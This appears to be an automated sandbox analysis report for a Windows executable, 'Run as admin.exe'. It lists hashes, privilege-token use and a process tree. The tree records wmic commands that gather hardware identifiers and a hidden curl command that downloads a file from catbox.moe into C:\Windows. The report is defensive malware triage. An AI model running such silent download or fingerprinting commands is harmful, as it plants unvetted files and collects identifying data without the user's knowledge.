Analysis
-
max time kernel
427s -
max time network
1149s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
28/09/2024, 22:50
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
Run as admin.exe
Resource
win11-20240802-en
windows11-21h2-x64
4 signatures
1800 seconds
General
-
Target
Run as admin.exe
-
Size
296KB
-
MD5
b1c0c309a7574b24abfc2ec22fe879e8
-
SHA1
b2bde1e54c9d15717a4ac692e82461c979a1e895
-
SHA256
364fef83527cf425daeda9afbd77ea5466a90ab6de41d55dcb2d750c8cb34247
-
SHA512
c008b82a4e8e31db5dac9b37b0bac38b96fc275eed2ca8748ee3c6cd57a0a916d772a04f9e49d7376c030498a3ceaf3f03418a00c53762b2b95ee38251a7451d
-
SSDEEP
3072:nCH7/661TBPYw5weLegNrpJNxUmudrE3XRsR6FF5oXUELgeDXY6NHWw7iiowBAjU:p6TnSevJXulEHYmFmFXB7iignNbpX
Score
4/10
Malware Config
Signatures
-
Drops file in Windows directory 1 IoCs
description ioc Process File created \??\c:\Windows\fortnite.ttf curl.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3096 Run as admin.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 3840 wmic.exe Token: SeSecurityPrivilege 3840 wmic.exe Token: SeTakeOwnershipPrivilege 3840 wmic.exe Token: SeLoadDriverPrivilege 3840 wmic.exe Token: SeSystemProfilePrivilege 3840 wmic.exe Token: SeSystemtimePrivilege 3840 wmic.exe Token: SeProfSingleProcessPrivilege 3840 wmic.exe Token: SeIncBasePriorityPrivilege 3840 wmic.exe Token: SeCreatePagefilePrivilege 3840 wmic.exe Token: SeBackupPrivilege 3840 wmic.exe Token: SeRestorePrivilege 3840 wmic.exe Token: SeShutdownPrivilege 3840 wmic.exe Token: SeDebugPrivilege 3840 wmic.exe Token: SeSystemEnvironmentPrivilege 3840 wmic.exe Token: SeRemoteShutdownPrivilege 3840 wmic.exe Token: SeUndockPrivilege 3840 wmic.exe Token: SeManageVolumePrivilege 3840 wmic.exe Token: 33 3840 wmic.exe Token: 34 3840 wmic.exe Token: 35 3840 wmic.exe Token: 36 3840 wmic.exe Token: SeIncreaseQuotaPrivilege 3840 wmic.exe Token: SeSecurityPrivilege 3840 wmic.exe Token: SeTakeOwnershipPrivilege 3840 wmic.exe Token: SeLoadDriverPrivilege 3840 wmic.exe Token: SeSystemProfilePrivilege 3840 wmic.exe Token: SeSystemtimePrivilege 3840 wmic.exe Token: SeProfSingleProcessPrivilege 3840 wmic.exe Token: SeIncBasePriorityPrivilege 3840 wmic.exe Token: SeCreatePagefilePrivilege 3840 wmic.exe Token: SeBackupPrivilege 3840 wmic.exe Token: SeRestorePrivilege 3840 wmic.exe Token: SeShutdownPrivilege 3840 wmic.exe Token: SeDebugPrivilege 3840 wmic.exe Token: SeSystemEnvironmentPrivilege 3840 wmic.exe Token: SeRemoteShutdownPrivilege 3840 wmic.exe Token: SeUndockPrivilege 3840 wmic.exe Token: SeManageVolumePrivilege 3840 wmic.exe Token: 33 3840 wmic.exe Token: 34 3840 wmic.exe Token: 35 3840 wmic.exe Token: 36 3840 wmic.exe Token: SeIncreaseQuotaPrivilege 5740 wmic.exe Token: SeSecurityPrivilege 5740 wmic.exe Token: SeTakeOwnershipPrivilege 5740 wmic.exe Token: SeLoadDriverPrivilege 5740 wmic.exe Token: SeSystemProfilePrivilege 5740 wmic.exe Token: SeSystemtimePrivilege 5740 wmic.exe Token: SeProfSingleProcessPrivilege 5740 wmic.exe Token: SeIncBasePriorityPrivilege 5740 wmic.exe Token: SeCreatePagefilePrivilege 5740 wmic.exe Token: SeBackupPrivilege 5740 wmic.exe Token: SeRestorePrivilege 5740 wmic.exe Token: SeShutdownPrivilege 5740 wmic.exe Token: SeDebugPrivilege 5740 wmic.exe Token: SeSystemEnvironmentPrivilege 5740 wmic.exe Token: SeRemoteShutdownPrivilege 5740 wmic.exe Token: SeUndockPrivilege 5740 wmic.exe Token: SeManageVolumePrivilege 5740 wmic.exe Token: 33 5740 wmic.exe Token: 34 5740 wmic.exe Token: 35 5740 wmic.exe Token: 36 5740 wmic.exe Token: SeIncreaseQuotaPrivilege 5740 wmic.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 3096 wrote to memory of 3840 3096 Run as admin.exe 79 PID 3096 wrote to memory of 3840 3096 Run as admin.exe 79 PID 3096 wrote to memory of 5740 3096 Run as admin.exe 82 PID 3096 wrote to memory of 5740 3096 Run as admin.exe 82 PID 3096 wrote to memory of 5272 3096 Run as admin.exe 84 PID 3096 wrote to memory of 5272 3096 Run as admin.exe 84 PID 3096 wrote to memory of 2136 3096 Run as admin.exe 86 PID 3096 wrote to memory of 2136 3096 Run as admin.exe 86 PID 3096 wrote to memory of 720 3096 Run as admin.exe 88 PID 3096 wrote to memory of 720 3096 Run as admin.exe 88 PID 3096 wrote to memory of 5472 3096 Run as admin.exe 90 PID 3096 wrote to memory of 5472 3096 Run as admin.exe 90 PID 5472 wrote to memory of 4412 5472 cmd.exe 91 PID 5472 wrote to memory of 4412 5472 cmd.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\Run as admin.exe"C:\Users\Admin\AppData\Local\Temp\Run as admin.exe"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\System32\Wbem\wmic.exewmic baseboard get serialnumber2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3840
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get processorid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5740
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get uuid2⤵PID:5272
-
-
C:\Windows\System32\Wbem\wmic.exewmic path win32_computersystemproduct get uuid2⤵PID:2136
-
-
C:\Windows\System32\Wbem\wmic.exewmic path Win32_NetworkAdapter where "PNPDeviceID like '%%PCI%%' AND NetConnectionStatus = 2 AND AdapterTypeID = '0'" get MacAddress2⤵PID:720
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://files.catbox.moe/u0u5nj.ttf --output c:\Windows\fortnite.ttf >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:5472 -
C:\Windows\system32\curl.execurl https://files.catbox.moe/u0u5nj.ttf --output c:\Windows\fortnite.ttf3⤵
- Drops file in Windows directory
PID:4412
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
232KB
MD5c8c8dd1acb9d39ef7fee4c9adb696b5d
SHA1d011763990b860412fe38afd314654fdb79d5c21
SHA2566e2c63af95e794943ff8f2a57dcfc62195693c244a6ec977361475a0368a6786
SHA512db5dc4e536ef08ee05231860bd4ed40a9373282c00e42397e80b9e42fd98012337852bd5b0b1058ff2913c9de516722ae86d56b30a523bd25d5f22f4d005cc7c